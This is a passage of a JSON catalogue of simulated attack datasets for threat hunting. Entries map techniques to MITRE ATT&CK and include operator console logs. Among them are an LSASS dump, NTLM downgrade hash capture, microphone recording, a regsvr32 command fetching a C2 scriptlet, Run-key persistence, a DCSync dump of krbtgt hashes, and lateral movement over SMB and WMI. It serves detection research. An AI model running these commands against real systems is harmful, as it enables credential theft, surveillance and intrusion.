"type": "atomic", "tags": ["RDP Interactive"], "description": "This dataset represents adversaries using RDP and task manager interactively and dump the memory space of lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Remote Interactive Task Manager LSASS Dump", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-191030201010.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/rdp_interactive_taskmanager_lsass_dump.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "Interactive Session", "name": "RDP", "module": null, "script": null}], "permissions_required": ["Administrator"], "adversary_view": "RDP to victim\nOpen Windows Task Manager as Administrator\nSelect lsass.exe\nRight-click on lsass.exe and select \u201cCreate dump file\u201d"}, "references": null}, "SDWIN-191027223020": {"title": "Covenant ShellCmd InstallUtil", "id": "SDWIN-191027223020", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/10/27", "modification_date": "2020/09/19", "platform": ["Windows"], "type": "atomic", "tags": ["InstallUtil", "LOLBin"], "description": "This dataset represents adversaries proxy executing code through InstallUtil, a trusted Windows utility.", "attack_mappings": [{"technique": "T1218", "sub-technique": "004", "tactics": ["TA0005", "TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/covenant_installutil.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": 
"https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}], "permissions_required": ["User"], "adversary_view": "Upload Task: GruntHTTP.dll -> C:\\ProgramData\\GruntHTTP.dll\n(wardog) > ShellCmd /shellcommand:\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /u c:\\ProgramData\\GruntHTTP.dll\""}, "references": null}, "SDWIN-191225045202": {"title": "Empire Invoke InternalMonologue", "id": "SDWIN-191225045202", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/12/25", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Registry Modification", "Windows Registry NetNTLM settings", "Downgrade"], "description": "This dataset represents adversaries downgrading the challenge/response authentication protocol used for network logons, the minimum security negotiated for applications using NTLMSSP, and security settings that restrict outgoing NTLM traffic to remote servers in an environment", "attack_mappings": [{"technique": "T1112", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Extended NetNTLM Downgrade", "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-191224222300.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_monologue_netntlm_downgrade.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_internal_monologue", "script": "https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-InternalMonologue.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: XFLEZM9N) > usemodule credentials/invoke_internal_monologue*\n(Empire: 
powershell/credentials/invoke_internal_monologue) > info\n\n Name: Invoke-InternalMonologue\n Module: powershell/credentials/invoke_internal_monologue\n NeedsAdmin: True\n OpsecSafe: False\n Language: powershell\nMinLanguageVersion: 2\n Background: False\nOutputExtension: None\n\nAuthors:\n@eladshamir\n@4lex\n\nDescription:\nUses the Internal Monologue attack to force easily-\ndecryptable Net-NTLMv1 responses over localhost and without\ndirectly touching LSASS.\nhttps://github.com/eladshamir/Internal-Monologue\n\nComments:\nThe underlying powershell function accepts switches that\n[DISABLE] default behaviours. The default settings will\ndowngrade NetNTLM responses to v1, impersonate all users,\nuse challenge 1122334455667788 and restore the registry to\nits original state. Set the options in this module to True\nin order to DISABLE the behaviours Disabling Downgrade and\nImpersonation yields higher OPSEC, but less than ideal loot\n\nOptions:\n\nName Required Value Description\n---- -------- ------- -----------\nAgent True XFLEZM9N Agent to use for InternalMonologue \nChallenge True 1122334455667788 Net-NTLM Challenge to send \nDowngrade False DISABLE downgrading to allow Net-NTLMv1 \n responses \nImpersonate False DISABLE user impersonation and fetch \n only current user \nRestore False DISABLE restoring the registry setting \n that allowed v1 responses \nVerbose False Verbose \n\n(Empire: powershell/credentials/invoke_internal_monologue) > execute\n[>] Module is not opsec safe, run? 
[y/N] y\n[*] Tasked XFLEZM9N to run TASK_CMD_WAIT\n[*] Agent XFLEZM9N tasked with task ID 2\n[*] Tasked agent XFLEZM9N to run module powershell/credentials/invoke_internal_monologue\n(Empire: powershell/credentials/invoke_internal_monologue) > pgustavo::shire:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:1122334455667788\nIT001$::shire:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:1122334455667788"}, "references": null}, "SDWIN-200609225055": {"title": "MSF Record Mic", "id": "SDWIN-200609225055", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/06/09", "modification_date": "2020/06/09", "platform": ["Windows"], "type": "atomic", "tags": ["Microphone Access"], "description": "This dataset represents adversaries accessing the microphone of an endpoint.", "attack_mappings": [{"technique": "T1123", "sub-technique": null, "tactics": ["TA0009"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Processes Accessing the Microphone Device", "link": "https://threathunterplaybook.com/notebooks/windows/09_collection/WIN-200609225055.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/collection/host/msf_record_mic.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Metasploit", "module": "post", "script": "https://github.com/pwnieexpress/metasploit-framework/blob/master/modules/post/multi/manage/record_mic.rb"}], "permissions_required": ["User"], "adversary_view": "msf5 exploit(multi/handler) > use post/multi/manage/record_mic\nmsf5 post(multi/manage/record_mic) > set SESSION 2\nSESSION => 2\nmsf5 post(multi/manage/record_mic) > info\n\n Name: Multi Manage Record Microphone\n Module: post/multi/manage/record_mic\n Platform: Linux, OSX, Windows\n Arch: \n Rank: Normal\n\nProvided by:\n sinn3r \n\nCompatible session 
types:\n Meterpreter\n\nBasic options:\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n DURATION 5 no Number of seconds to record\n SESSION 2 yes The session to run this module on.\n\nDescription:\n This module will enable and record your target's microphone. For \n non-Windows targets, please use Java meterpreter to be able to use \n this feature.\n\nmsf5 post(multi/manage/record_mic) > run\n\n[*] 172.18.39.6 - 20%...\n[*] 172.18.39.6 - 40%...\n[*] 172.18.39.6 - 60%...\n[*] 172.18.39.6 - 80%...\n[*] 172.18.39.6 - 100%...\n[*] 172.18.39.6 - Audio size: (55169 bytes)\n[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav\n[*] Post module execution completed\nmsf5 post(multi/manage/record_mic) >"}, "references": null}, "SDWIN-200721232741": {"title": "Empire Regsvr32 Execution", "id": "SDWIN-200721232741", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/07/21", "modification_date": "2020/07/21", "platform": ["Windows"], "type": "atomic", "tags": ["Regsvr32 Execution"], "description": "This dataset represents threat actors leveraging regsvr32 to proxy the execution of an empire payload (.sct file) to create a reverse connection to the C2.", "attack_mappings": [{"technique": "T1218", "sub-technique": "010", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_launcher_sct_regsvr32.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "launcher", "script": "https://github.com/BC-SECURITY/Empire/blob/master/lib/stagers/windows/launcher_sct.py"}], "permissions_required": ["Administrator"], "adversary_view": "Threat Actor View:\n(Empire) > usestager windows/launcher_sct\n(Empire: stager/windows/launcher_sct) > info\n\nName: 
regsvr32\n\nDescription:\n Generates an sct file (COM Scriptlet) Host this\n anywhere\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Listener True Listener to generate stager for.\n Language True powershell Language of the stager to generate.\n StagerRetries False 0 Times for the stager to retry\n connecting.\n Base64 True True Switch. Base64 encode the output.\n Obfuscate False False Switch. Obfuscate the launcher\n powershell code, uses the\n ObfuscateCommand for obfuscation types.\n For powershell only.\n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use.\n Only used if Obfuscate switch is True.\n For powershell only.\n OutFile False /tmp/launcher.sct File to output SCT to, otherwise\n displayed on the screen.\n UserAgent False default User-agent string to use for the staging\n request (default, none, or other).\n Proxy False default Proxy to use for request (default, none,\n or other).\n ProxyCreds False default Proxy credentials\n ([domain\\]username:password) to use for\n request (default, none, or other).\n\n\n(Empire: stager/windows/launcher_sct) > set Listener http\n(Empire: stager/windows/launcher_sct) > execute\n\n[*] Stager output written out to: /tmp/launcher.sct\n\nVictim's PC\n\nPS C:\\Windows\\System32> .\\regsvr32.exe /s /n /u /i:http://10.10.10.5:8444/launcher.sct scrobj.dll\n\nThreat Actor View:\n\n(Empire: stager/windows/launcher_sct) > back\n(Empire) > \nEmpire: agents) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent 712ETU3B checked in\n[+] Initial agent 712ETU3B from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to 712ETU3B at 172.18.39.5\n\n(Empire: agents) > \n(Empire: agents) > \n(Empire: agents) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n712ETU3B ps 172.18.39.5 WORKSTATION5 
*MORDOR\\pgustavo powershell 9076 5/0.0 2020-07-22 03:29:27 http \n\n(Empire: agents) >"}, "references": null}, "SDWIN-200722001847": {"title": "Empire Elevated Registry Run Keys", "id": "SDWIN-200722001847", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/07/22", "modification_date": "2020/09/04", "platform": ["Windows"], "type": "atomic", "tags": ["Local Registry Modification", "Registry Run Keys"], "description": "This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) for persistence. It also captures the execution of the persistence mechanism.", "attack_mappings": [{"technique": "T1547", "sub-technique": "001", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_persistence_registry_modification_run_keys_elevated_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "elevated_registry", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: 712ETU3B) > agents\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n712ETU3B ps 172.18.39.5 WORKSTATION5 *MORDOR\\pgustavo powershell 9076 5/0.0 2020-07-22 04:06:31 http \n\n(Empire: agents) > \n(Empire: agents) > interact 712ETU3B\n(Empire: 712ETU3B) > \n(Empire: 712ETU3B) > usemodule persistence/elevated/registry*\n\n(Empire: 712ETU3B) > usemodule persistence/elevated/registry*\n(Empire: powershell/persistence/elevated/registry) > info\n\n Name: Invoke-Registry\n Module: powershell/persistence/elevated/registry\n NeedsAdmin: True\n OpsecSafe: False\n Language: 
powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @mattifestation\n @harmj0y\n\nDescription:\n Persist a stager (or script) via the\n HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry\n key. This has an easy detection/removal rating.\n\nComments:\n https://github.com/mattifestation/PowerSploit/blob/master/Pe\n rsistence/Persistence.psm1\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True 712ETU3B Agent to run module on. \n Listener False Listener to use. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n KeyName True Updater Key name for the run trigger. \n RegPath False HKLM:SOFTWARE\\Microsoft\\ Registry location to store the script \n Windows\\CurrentVersion\\D code. Last element is the key name. \n ebug \n ADSPath False Alternate-data-stream location to store \n the script code. \n ExtFile False Use an external file for the payload \n instead of a stager. \n Cleanup False Switch. Cleanup the trigger and any \n script from specified location. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/persistence/elevated/registry) > set Listener http\n(Empire: powershell/persistence/elevated/registry) > execute\n[>] Module is not opsec safe, run? 
[y/N] y\n[*] Tasked 712ETU3B to run TASK_CMD_WAIT\n[*] Agent 712ETU3B tasked with task ID 7\n[*] Tasked agent 712ETU3B to run module powershell/persistence/elevated/registry\n(Empire: powershell/persistence/elevated/registry) > \nRegistry persistence established using listener http stored in HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Debug.\n\n(Empire: powershell/persistence/elevated/registry) >"}, "references": null}, "SDWIN-200724174200": {"title": "Covenant Remote WMI Eventing ActiveScriptEventConsumers", "id": "SDWIN-200724174200", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/07/24", "modification_date": "2020/07/24", "platform": ["Windows"], "type": "atomic", "tags": ["Remote WMI Eventing"], "description": "This dataset represents adversaries using WMI event subscriptions (ActiveScriptEventConsumers) remotely to move laterally.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "manual", "name": "shell", "module": "manual", "script": "https://3xpl01tc0d3r.blogspot.com/2020/02/gadgettojscript-covenant-donut.html"}], "permissions_required": ["Administrator"], "adversary_view": null}, "references": ["https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/"]}, "SDWIN-200805020926": {"title": "Covenant DCSync", "id": "SDWIN-200805020926", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": 
"2020/08/05", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["AD Replication Services", "RPC DRSUAPI DsGetNCChanges"], "description": "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.", "attack_mappings": [{"technique": "T1003", "sub-technique": "006", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "DCSync", "script": "https://github.com/cobbr/Covenant/blob/c4d7eba0cfc29e3d5961248ec984a209d4d05de3/Covenant/Data/Tasks/SharpSploit.Credentials.yaml"}], "permissions_required": ["Domain Admin"], "adversary_view": "(wardog) > DCSync /username:\"krbtgt\" /fqdn:\"theshire.local\" /dc:\"MORDORDC\"\n\n .#####. mimikatz 2.2.0 (x64) #17763 Apr 9 2019 23:22:27\n.## ^ ##. 
\"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n\nmimikatz(powershell) # lsadump::dcsync /user:krbtgt /domain:theshire.local /dc:MORDORDC\n[DC] 'theshire.local' will be the domain\n[DC] 'MORDORDC' will be the DC server\n[DC] 'krbtgt' will be the user account\n\nObject RDN : krbtgt\n\n** SAM ACCOUNT **\n\nSAM Username : krbtgt\nAccount Type : 30000000 ( USER_OBJECT )\nUser Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )\nAccount expiration : \nPassword last change : 8/4/2020 9:30:22 PM\nObject Security ID : S-1-5-21-3669966080-2286457517-972388166-502\nObject Relative ID : 502\n\nCredentials:\n Hash NTLM: 9810d5b30826619ed962194bc35cb66d\n ntlm- 0: 9810d5b30826619ed962194bc35cb66d\n lm - 0: 2bd18bfa988700fc1f845909043f7785\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n Random Value : d7477916da5d01ca6366caaad478f535\n\n* Primary:Kerberos-Newer-Keys *\n Default Salt : THESHIRE.LOCALkrbtgt\n Default Iterations : 4096\n Credentials\n aes256_hmac (4096) : 1ffb5b5ca0ba20b19de132f44a580d67c96362f4ec21c8e8057ad8b4a5cbe99e\n aes128_hmac (4096) : 49e4ec6edd3d27f0eda5ed4b32df29c4\n des_cbc_md5 (4096) : f162e6c46b5d10e9\n\n* Primary:Kerberos *\n Default Salt : THESHIRE.LOCALkrbtgt\n Credentials\n des_cbc_md5 : f162e6c46b5d10e9\n\n* Packages *\n NTLM-Strong-NTOWF\n\n* Primary:WDigest *\n 01 1e9687e12c22c61ce56e06b679067068\n 02 bd4ff4a6ad0092c086110d7f177bf2dd\n 03 bef34dc3488c458be7a07de25cee5c25\n 04 1e9687e12c22c61ce56e06b679067068\n 05 bd4ff4a6ad0092c086110d7f177bf2dd\n 06 ec54a02a8b4c407023b921f839db0695\n 07 1e9687e12c22c61ce56e06b679067068\n 08 34460bb2c44aae9f8397a5df0846babd\n 09 34460bb2c44aae9f8397a5df0846babd\n 10 0a104dba17fcb7b32f0a39c5694ae42d\n 11 cec2d9932979ed578ba260b233290ad6\n 12 
34460bb2c44aae9f8397a5df0846babd\n 13 dbd9ff299298ee7649121015643a45c0\n 14 cec2d9932979ed578ba260b233290ad6\n 15 2d5f29cfd994b4a31dc71ff0d4f4b735\n 16 2d5f29cfd994b4a31dc71ff0d4f4b735\n 17 1a6e2adbc126ac59916af47ca0c2047d\n 18 b99ae20fdbff05738cc3c4341f5819b0\n 19 791ed67574eee311ed74e911f840e622\n 20 71d939df702fe13f003e39b9421f450d\n 21 cc9c9f66309c5d6412773943efa08efd\n 22 cc9c9f66309c5d6412773943efa08efd\n 23 1f076ec382ae6f7cf5ca3750ad70c140\n 24 a16cb7dc0b7a969d65aff54a4180d63a\n 25 a16cb7dc0b7a969d65aff54a4180d63a\n 26 80706a2b93f2a4d53d6df1b4b8bfe029\n 27 c3c8bedd3c2f3db046410f60ab728f57\n 28 e0b5d1db4b2119a9e621a2a3199828bb\n 29 b23dd36a70988139bbee48c668232993"}, "references": null}, "SDWIN-200805034820": {"title": "Covenant SC.exe Utility Query", "id": "SDWIN-200805034820", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/05", "modification_date": "2020/08/05", "platform": ["Windows"], "type": "atomic", "tags": ["RPC QueryServiceStatus", "SMB Svcctl"], "description": "This dataset represents an adversary leveraging the sc.exe utility to query (RPC QueryServiceStatus method) for the statu of a service on a remote endpoint.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sc_query_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sc_query_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "sc.exe \\\\WORKSTATION6 query 
ikeext"}, "references": null}, "SDWIN-200806012009": {"title": "Covenant SharpSC Query", "id": "SDWIN-200806012009", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/08/06", "platform": ["Windows"], "type": "atomic", "tags": ["RPC EnumServiceStatusW", "SMB Svcctl"], "description": "This dataset represents a threat actor leveraging the RPC method EnumServiceStatusW over SMB svcctl to query the status of a service on a remote endpoint..", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_query_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_query_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpSC /command:\"action=query computername=WORKSTATION6 service=ikeext\"\n\n[+] Service information for IKEEXT on WORKSTATION6:\n\n DisplayName: IKE and AuthIP IPsec Keying Modules\n ServiceName: IKEEXT\n Status : Stopped\n CanStop : False"}, "references": null}, "SDWIN-200806015757": {"title": "Covenant Remote File Copy", "id": "SDWIN-200806015757", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/08/06", "platform": ["Windows"], "type": "atomic", "tags": ["SMB CreateRequest"], "description": "This dataset represents a threat actor remotely copying a file over SMB (CreateRequest).", "attack_mappings": [{"technique": 
"T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "datasets": [{"name": "Covenant Remote File Copy"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_copy_smb_CreateRequest.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_copy_smb_CreateRequest.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "Copy", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "[09/22/2020 18:53:30 UTC] Copy completed\n(wardog) > Copy /source:\"C:\\Users\\pgustavo\\Desktop\\GruntHTTP.exe\" /destination:\"\\\\WORKSTATION6\\C$\\ProgramData\\GruntHTTP.exe\"\n\nSuccessfully copied file from: C:\\Users\\pgustavo\\Desktop\\GruntHTTP.exe to: \\\\WORKSTATION6\\C$\\ProgramData\\GruntHTTP.exe"}, "references": null}, "SDWIN-200806022635": {"title": "Covenant SharpSC Create", "id": "SDWIN-200806022635", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC CreateService", "SMB Svcctl"], "description": "This dataset represents adversaries remotely creating a service via RPC methods such as CreateService over SMB named pipes such as svcctl.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_create_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_create_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": 
"Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpSC /command:\"action=create computername=WORKSTATION6 service=Cyb3rWard0g displayname=OTR binpath=C:\\Windows\\System32\\GruntHTTP2.exe\"\n\n[-] Error uninstalling Cyb3rWard0g on WORKSTATION6. Reason: ServiceHandle is invalid.\n\n[*] Attempting to create service Cyb3rWard0g on WORKSTATION6...\n\n[*] Created Cyb3rWard0g Service on WORKSTATION6"}, "references": null}, "SDWIN-200806030120": {"title": "Covenant SharpSC Start", "id": "SDWIN-200806030120", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC StartService", "SMB Svcctl"], "description": "This dataset represents adversaries remotely starting a service via RPC methods such as StartService over SMB named pipes such as svcctl.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_start_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_start_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpSC /command:\"action=start computername=WORKSTATION6 service=ikeext\"\n\n[*] 
Attempting to start service ikeext on WORKSTATION6...\n\n[+] Successfully started ikeext on WORKSTATION6!\n\n DisplayName: IKE and AuthIP IPsec Keying Modules\n\n ServiceName: ikeext\n\n Status : Running\n\n CanStop : True"}, "references": null}, "SDWIN-200806031938": {"title": "Covenant SharpSC Stop Service", "id": "SDWIN-200806031938", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/08/06", "platform": ["Windows"], "type": "atomic", "tags": ["RPC ControlService", "Stop Service", "SMB Svcctl"], "description": "This dataset represents a threat actor using the RPC ControlService method over SMB to stop a service.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_stop_dcerpc_smb_svcctl.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_stop_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpSC /command:\"action=stop computername=WORKSTATION6 service=ikeext\"\n\n[*] Attempting to stop service ikeext on WORKSTATION6...\n\n[+] Successfully stopped ikeext on WORKSTATION6!\n\n DisplayName: IKE and AuthIP IPsec Keying Modules\n\n ServiceName: ikeext\n\n Status : Stopped\n\n CanStop : False\n https://github.com/djhohnstein/SharpSC"}, "references": null}, "SDWIN-200806035621": {"title": "Covenant SharpWMI Exec", "id": "SDWIN-200806035621", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], 
"creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["WMI IWbemServices ExecMethod"], "description": "This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpwmi_create_dcerpc_wmi.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpwmi_create_dcerpc_wmi.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpWMI", "script": "https://github.com/GhostPack/SharpWMI"}], "permissions_required": 